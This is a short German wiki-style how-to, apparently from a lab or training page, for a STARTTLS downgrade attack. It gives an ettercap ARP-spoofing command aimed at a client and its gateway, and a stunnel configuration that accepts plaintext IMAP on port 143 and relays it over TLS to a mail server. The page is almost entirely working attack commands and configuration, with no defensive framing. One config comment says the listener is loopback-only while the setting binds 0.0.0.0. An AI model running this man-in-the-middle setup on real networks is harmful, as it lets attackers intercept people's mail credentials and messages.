STARTTLS DOWNGRADE STUNNEL
Zur Navigation springen
Zur Suche springen
Benötigte Paket
- apt-get install ettercap-graphical
- CLIENT=10.0.10.55
- GATEWAY=10.0.10.1
- INTERFACE=eth0
Befehl
- ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//
optionen -i eth0 = Interface -T = Textmodus -q = still -M arp = ARP Spoofing
STUNNEL
- cat /etc/stunnel/imap-stunnel.conf
; stunnel als TLS-Client -> IMAPS [imap] client = yes ; Lokal nur auf Loopback lauschen (IMAP im Klartext) accept = 0.0.0.0:143 ; Ziel: echter Mailserver auf IMAPS/993 connect = mail.example.com:993 ; Zertifikatsprüfung CAfile = /etc/ssl/certs/ca-certificates.crt verifyChain = yes checkHost = mail.example.com OCSPaia = yes ; SNI erzwingen (wichtig bei Multi-Certs) sni = mail.example.com